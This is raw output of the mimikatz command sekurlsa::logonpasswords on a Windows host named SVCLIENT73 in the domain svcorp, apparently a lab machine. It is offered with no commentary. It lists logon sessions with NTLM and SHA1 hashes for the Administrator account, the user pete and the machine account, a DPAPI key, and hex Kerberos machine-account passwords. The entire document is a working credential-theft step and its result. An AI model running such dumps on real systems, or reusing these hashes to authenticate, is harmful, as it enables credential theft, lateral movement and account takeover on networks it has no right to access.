sekurlsa::logonpasswords
mimikatz # 
Authentication Id : 0 ; 992020 (00000000:000f2314)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 14/04/2023 13:44:30
SID               : S-1-5-21-5689513-2783704404-2070145878-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SVCLIENT73
         * NTLM     : ee0c207898a5bccc01f38115019ca2fb
         * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 923393 (00000000:000e1701)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 23/02/2023 14:22:15
SID               : S-1-5-21-5689513-2783704404-2070145878-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SVCLIENT73
         * NTLM     : ee0c207898a5bccc01f38115019ca2fb
         * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 150596 (00000000:00024c44)
Session           : Interactive from 1
User Name         : pete
Domain            : svcorp
Logon Server      : SV-DC01
Logon Time        : 23/02/2023 13:39:26
SID               : S-1-5-21-466546139-763938477-1796994327-1121
        msv :
         [00000003] Primary
         * Username : pete
         * Domain   : svcorp
         * NTLM     : 0f951bc4fdc5dfcd148161420b9c6207
         * SHA1     : 40100bec51af3d9ee79ebae0e4d553d8615bae53
         * DPAPI    : 1edbe411d0b75aed07b0d20c24f99631
        tspkg :
        wdigest :
         * Username : pete
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : pete
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:04
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 51983 (00000000:0000cb0f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:04
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : d88b95e656bec02cdeaa56b924d186c7
         * SHA1     : 202903b2a6152f3e6f9c09a9f6841c023f336d22
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SVCLIENT73$
         * Domain   : svcorp.com
         * Password : 1a ae aa 11 7e c0 71 cf 4f d4 9a ac f6 8e 9a bd 7a d6 6f 48 da 41 6c 7a 66 cd 15 62 3d 14 8a 75 95 37 02 75 32 c6 c0 76 08 73 9e cf 7a 17 5e 7c 4d 07 1f a5 34 61 c3 8e 76 df 54 c9 c7 27 05 86 a2 36 ca f0 8f ed d4 1e 35 8b 8b a3 28 17 34 11 52 3b 06 62 e5 20 1c 28 cd e2 6c e6 52 a4 31 db 69 88 bb 2a 7b 46 30 20 61 dd af 9f ab 95 79 22 bd 60 ef 5e e6 df ef 50 26 ca f5 aa 06 3a d1 09 37 93 65 57 8e 28 1b 5f 10 d1 d5 bc bd 51 56 5b ab 00 06 6c 17 8c e7 e3 95 a3 55 5b 69 a4 fb ea 6e 9e 0a 5d 56 5c 9e 80 b0 f0 03 45 38 62 2b b2 bf bc fc d2 dc b6 4e 97 0a 63 1e 1f 54 79 5c e7 13 54 43 3c a3 72 9a 75 97 dd f9 4e 07 35 03 10 fd 79 1b 39 4a c9 ea 03 64 29 81 4d 58 ad b4 76 3d b8 ba 7c a5 26 4c a7 53 a5 5f d4 f1 bb 5a c7 
        ssp :
        credman :

Authentication Id : 0 ; 51282 (00000000:0000c852)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:04
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 59fc09cd86b93c6a3fe1d04752a0da62
         * SHA1     : b2e5f55844866320a9d06f27abc859a68a4087a8
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SVCLIENT73$
         * Domain   : svcorp.com
         * Password : 1b 13 79 bf 78 20 f8 ac b3 e9 4a 5d 7b fe 86 d6 8b ec d3 5e e2 47 65 c3 4f 8c 8e 09 32 a3 b2 50 f0 c0 51 c3 1d 23 74 ef 53 21 d0 ca ce 42 49 57 24 1d 0b 8c 99 d7 0c 07 fd 77 43 85 1b ef 13 b0 cb e0 cd f6 99 e3 e7 ab 6a fc da 97 ed b0 09 63 db c2 4d d3 f3 5c 85 2c 0a ea 1d 40 5e 6d cf cd 68 8b 27 c5 63 1c 5d 93 7a 95 f4 50 dc 53 12 00 a7 eb b4 fd 6b 4e 04 32 d9 ce af 00 68 ce ed ba b7 23 c2 39 ea 23 47 b4 00 75 eb 69 cb b8 ef da 6a 0a 45 e0 8f 14 cc 45 9b a2 34 f0 98 bf ca e3 08 2f ad b1 d8 11 0a 4a 65 f2 1c 29 39 45 20 2c a2 fe 0d 58 85 25 09 88 83 e0 23 f2 f9 96 a3 9a 85 c6 ad 42 dd 00 27 e3 65 0d 3f d5 85 4c 8f 5e 38 0f 91 70 eb 76 28 21 e3 3c e1 99 51 cd 4b 0f 43 5e 05 29 59 0a 10 89 c6 0a e4 93 77 6f 8f e3 
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:03
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 59fc09cd86b93c6a3fe1d04752a0da62
         * SHA1     : b2e5f55844866320a9d06f27abc859a68a4087a8
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : svclient73$
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30350 (00000000:0000768e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:03
SID               : 
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 59fc09cd86b93c6a3fe1d04752a0da62
         * SHA1     : b2e5f55844866320a9d06f27abc859a68a4087a8
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 23/02/2023 13:39:03
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : svclient73$
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :
